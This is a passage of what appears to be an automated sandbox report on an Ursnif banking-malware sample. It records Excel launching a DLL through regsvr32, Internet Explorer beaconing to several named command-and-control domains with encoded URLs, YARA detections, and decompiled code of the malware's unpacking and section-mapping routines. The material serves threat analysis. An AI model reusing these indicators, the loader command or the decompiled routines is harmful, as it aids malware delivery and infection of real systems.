                                                                                                                                                                            May 3, 2021 19:48:16.084508896 CEST1329INData Raw: ff 28 a8 93 ff 25 a0 8c ff 24 9a 87 ff 21 95 82 ff 1e 91 7e ff 1c 8e 7b ff 1a 8c 7a ff 19 8b 78 ff 17 89 77 ff 14 88 75 ff 10 86 73 ff 0c 84 70 ff 07 81 6d ff 05 9c 81 ff 00 ef c3 ff 00 d0 a9 ff 00 72 5c ff 00 6e 58 ff 00 69 53 ff 00 00 00 33 00
                                                                                                                                                                            Data Ascii: (%$!~{zxwuspmr\nXiS3jToYs]lortvy| ~$&(
                                                                                                                                                                            May 3, 2021 19:48:16.084530115 CEST1330INData Raw: f8 f8 ff f6 f6 f6 ff f4 f4 f4 ff f2 f2 f2 ff f0 f0 f0 ff ef ef ef ff ed ed ed ff ec ec ec ff eb eb eb ff eb eb eb ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea
                                                                                                                                                                            Data Ascii: ZBBB0#!}{xv
                                                                                                                                                                            May 3, 2021 19:48:16.084549904 CEST1331INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 5a ff 00 75 5f ff 00 79 63 ff 00 f9 cd ff 00
                                                                                                                                                                            Data Ascii: pZu_ycquwz{}~"$&'*-1(*yPPO
                                                                                                                                                                            May 3, 2021 19:48:16.084573030 CEST1333INData Raw: eb eb ff eb eb eb ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff ea ea ea ff eb eb eb ff ec ec ec ff ed ed ed ff ef ef ef ff f2 f2 f2 ff f5 f5 f5 ff f8 f8 f8 ff fc fc fc ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                            Data Ascii: [>><&}zv{ewar\3
                                                                                                                                                                            May 3, 2021 19:48:16.265486956 CEST1338INData Raw: 43 64 7b 00 00 61 81 ff ff 00 00 00 00 26 73 24 21 b3 38 72 5d 18 36 52 f5 ff ff 00 00 00 29 74 8f 79 6f 5d a1 00 00 00 cf 51 bf 39 42 7d 39 bf ff ff 00 00 00 00 ff 21 ae fe 78 f0 ff 20 20 00 88 a8 d7 6e 94 f8 6d 88 f0 00 20 20 00 00 00 00 00 ab
                                                                                                                                                                            Data Ascii: Cd{a&s$!8r]6R)tyo]Q9B}9!x nm `3*|4ZDr Mj =|@?r)\Xl.6t!|rZ|vcw@u @Y8N9E2


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            1192.168.2.44976534.86.224.880C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            May 3, 2021 19:49:26.173763037 CEST6094OUTGET /z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0x6FbAwTSzE/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX/qwpRyPlhL_2FkPNb/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fm HTTP/1.1
                                                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: app.buboleinov.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            May 3, 2021 19:49:26.929080009 CEST6095INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Mon, 03 May 2021 17:49:26 GMT
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            2192.168.2.44977934.86.224.880C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            May 3, 2021 19:50:10.219878912 CEST7018OUTGET /pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVKXUKrMq/O25bJi9K6cy2wBFt/EYfe_2FKkVGOswo/zrljXUlqaCddZUQdMz/46rOG0TD7/jSwGOmqtlI1lhZnMTkpj/OVdYkB6bCvlTi8j76Hq/ls7qgwy0MLToWsmBH4qSen/tk209OxMyhspY/JW_2B_2B/JDgZlFf6GkmqLMRn5B4cp37/KRW8p6Kt3j/I1_2FzkkwDlUgXN_2/B8sJnr99OISw/18ko4KjrRQ1/26TtcKYNzHhDSL/9AqfJNAejPb1kyuCVpyID/xExOyq0w/s HTTP/1.1
                                                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: chat.billionady.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            May 3, 2021 19:50:10.962115049 CEST7019INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Mon, 03 May 2021 17:50:10 GMT
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            3192.168.2.44978234.86.224.880C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            May 3, 2021 19:50:34.266048908 CEST7021OUTGET /F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/4wB0QgN10EkpX/AcOnUpOy/sx6xA_2BQgCwb8YrqbLddxV/OJDcwH612j/SgvuMvjnhyj_2BJZu/QEAjCzH7iakZ/oq21_2FJOeJ/SwjqqZOEiD8hxw/G5RB86oNRHPQeS1WmQofx/9xSmKamg1DMw2k9J/4izLK3dr4GQOE25/kgxEQPFLWO2XCIrGa5/PGMRBxlzM/0Ejxm5VgBpRdVV0sXhjU/M_2BEEG31ubNw2v0Fmu/Lkyp4hip_2Fjy_2FVx4B63/WkF_2BbbsvI0l/DMReAFgM/oHuJg HTTP/1.1
                                                                                                                                                                            Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: app3.maintorna.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            May 3, 2021 19:50:35.009057999 CEST7021INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Mon, 03 May 2021 17:50:34 GMT
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                            Code Manipulations

                                                                                                                                                                            Statistics

                                                                                                                                                                            CPU Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Memory Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Behavior

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            System Behavior

                                                                                                                                                                            Analysis Process: EXCEL.EXE PID: 6844 Parent PID: 800

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:48:09
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                            Imagebase:0x220000
                                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Chronological Activities

                                                                                                                                                                            Analysis Process: regsvr32.exe PID: 7148 Parent PID: 6844

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:48:16
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:regsvr32 -s C:\Users\Public\block.dll
                                                                                                                                                                            Imagebase:0x390000
                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Chronological Activities

                                                                                                                                                                            Analysis Process: iexplore.exe PID: 1260 Parent PID: 800

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:49:23
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                            Imagebase:0x7ff7cee40000
                                                                                                                                                                            File size:823560 bytes
                                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Chronological Activities

                                                                                                                                                                            Analysis Process: iexplore.exe PID: 5696 Parent PID: 1260

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:49:24
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2
                                                                                                                                                                            Imagebase:0xce0000
                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Chronological Activities

                                                                                                                                                                            Analysis Process: iexplore.exe PID: 5828 Parent PID: 800

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:50:07
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                            Imagebase:0x7ff7cee40000
                                                                                                                                                                            File size:823560 bytes
                                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Chronological Activities

                                                                                                                                                                            Analysis Process: iexplore.exe PID: 6384 Parent PID: 5828

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:50:08
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2
                                                                                                                                                                            Imagebase:0xce0000
                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Chronological Activities

                                                                                                                                                                            Analysis Process: iexplore.exe PID: 4996 Parent PID: 800

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:50:31
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                            Imagebase:0x7ff7cee40000
                                                                                                                                                                            File size:823560 bytes
                                                                                                                                                                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Chronological Activities

                                                                                                                                                                            Analysis Process: iexplore.exe PID: 5368 Parent PID: 4996

                                                                                                                                                                            General

                                                                                                                                                                            Start time:19:50:32
                                                                                                                                                                            Start date:03/05/2021
                                                                                                                                                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2
                                                                                                                                                                            Imagebase:0xce0000
                                                                                                                                                                            File size:822536 bytes
                                                                                                                                                                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Chronological Activities

                                                                                                                                                                            Disassembly

                                                                                                                                                                            Code Analysis

                                                                                                                                                                            Reset < >

                                                                                                                                                                              Analysis Process: regsvr32.exe PID: 7148 Parent PID: 6844 regsvr32.exeCOMMON

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              Function 66DFBFB5, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,000007A6,00003000,00000040,000007A6,66DFBA10), ref: 66DFC072
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,0000002B,00003000,00000040,66DFBA6E), ref: 66DFC0A9
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,0000F0DD,00003000,00000040), ref: 66DFC109
                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 66DFC13F
                                                                                                                                                                              • VirtualProtect.KERNEL32(66DB0000,00000000,00000004,66DFBF94), ref: 66DFC244
                                                                                                                                                                              • VirtualProtect.KERNEL32(66DB0000,00001000,00000004,66DFBF94), ref: 66DFC26B
                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,66DFBF94), ref: 66DFC338
                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000002,66DFBF94,?), ref: 66DFC38E
                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 66DFC3AA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014767810.0000000066DFB000.00000040.00020000.sdmp, Offset: 66DFB000, based on PE: false
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2574235972-0
                                                                                                                                                                              • Opcode ID: 1152dc6f38a6bf9fe1bda6254ba7163402deb398324214f3b73d2ee5c3fae3d3
                                                                                                                                                                              • Instruction ID: 8080aa7fbe1b0c295166a8057a59423acb11cd2f1cb21abe4f68a8f64ce752ff
                                                                                                                                                                              • Opcode Fuzzy Hash: 1152dc6f38a6bf9fe1bda6254ba7163402deb398324214f3b73d2ee5c3fae3d3
                                                                                                                                                                              • Instruction Fuzzy Hash: 92D14672600209AFDB11CF5CC880A5237BAFF48310B1F4A94ED4D9F69AE671ED219B74
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB1979, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 69%
                                                                                                                                                                              			E66DB1979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L66DB2210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x66db41d0;
				_push(_t15 + 0x66db505e);
				_push(_t15 + 0x66db5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L66DB220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x66db41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                                                                                                                                              0x66db1979
                                                                                                                                                                              0x66db1982
                                                                                                                                                                              0x66db1986
                                                                                                                                                                              0x66db198c
                                                                                                                                                                              0x66db1991
                                                                                                                                                                              0x66db1996
                                                                                                                                                                              0x66db1999
                                                                                                                                                                              0x66db199c
                                                                                                                                                                              0x66db19a1
                                                                                                                                                                              0x66db19a2
                                                                                                                                                                              0x66db19a5
                                                                                                                                                                              0x66db19b0
                                                                                                                                                                              0x66db19b7
                                                                                                                                                                              0x66db19bb
                                                                                                                                                                              0x66db19bd
                                                                                                                                                                              0x66db19be
                                                                                                                                                                              0x66db19c1
                                                                                                                                                                              0x66db19c6
                                                                                                                                                                              0x66db19d0
                                                                                                                                                                              0x66db19d2
                                                                                                                                                                              0x66db19d2
                                                                                                                                                                              0x66db19e6
                                                                                                                                                                              0x66db19ec
                                                                                                                                                                              0x66db19f0
                                                                                                                                                                              0x66db1a40
                                                                                                                                                                              0x66db19f2
                                                                                                                                                                              0x66db19fb
                                                                                                                                                                              0x66db1a11
                                                                                                                                                                              0x66db1a19
                                                                                                                                                                              0x66db1a2b
                                                                                                                                                                              0x66db1a2f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1a1b
                                                                                                                                                                              0x66db1a1e
                                                                                                                                                                              0x66db1a23
                                                                                                                                                                              0x66db1a25
                                                                                                                                                                              0x66db1a25
                                                                                                                                                                              0x66db1a06
                                                                                                                                                                              0x66db1a08
                                                                                                                                                                              0x66db1a31
                                                                                                                                                                              0x66db1a32
                                                                                                                                                                              0x66db1a32
                                                                                                                                                                              0x66db19fb
                                                                                                                                                                              0x66db1a48

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?,?), ref: 66DB1986
                                                                                                                                                                              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 66DB199C
                                                                                                                                                                              • _snwprintf.NTDLL ref: 66DB19C1
                                                                                                                                                                              • CreateFileMappingW.KERNELBASE(000000FF,66DB41C0,00000004,00000000,?,?), ref: 66DB19E6
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?), ref: 66DB19FD
                                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 66DB1A11
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?), ref: 66DB1A29
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A), ref: 66DB1A32
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,66DB176E,0000000A,?), ref: 66DB1A3A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1724014008-0
                                                                                                                                                                              • Opcode ID: 2187b91e7d353c5f6c43077769b49785a11c9470a7b5ba9a1e4bdbdcdb4be460
                                                                                                                                                                              • Instruction ID: 80d25d5f9bc57f51f48f707be9af4ac9c35cdf68f1714765268204654da0a468
                                                                                                                                                                              • Opcode Fuzzy Hash: 2187b91e7d353c5f6c43077769b49785a11c9470a7b5ba9a1e4bdbdcdb4be460
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B21C5F2900118FFEB10AF99DC85E9E7BBDEB89354F114025F612D7188D630AD45CBA0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB18D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                              			E66DB18D1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E66DB1B89(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                                                                                                              0x66db18da
                                                                                                                                                                              0x66db18e1
                                                                                                                                                                              0x66db18e2
                                                                                                                                                                              0x66db18e3
                                                                                                                                                                              0x66db18e4
                                                                                                                                                                              0x66db18e5
                                                                                                                                                                              0x66db18f6
                                                                                                                                                                              0x66db18fa
                                                                                                                                                                              0x66db190e
                                                                                                                                                                              0x66db1911
                                                                                                                                                                              0x66db1914
                                                                                                                                                                              0x66db191b
                                                                                                                                                                              0x66db191e
                                                                                                                                                                              0x66db1925
                                                                                                                                                                              0x66db1928
                                                                                                                                                                              0x66db192b
                                                                                                                                                                              0x66db192e
                                                                                                                                                                              0x66db1933
                                                                                                                                                                              0x66db196e
                                                                                                                                                                              0x66db1935
                                                                                                                                                                              0x66db1938
                                                                                                                                                                              0x66db193e
                                                                                                                                                                              0x66db1943
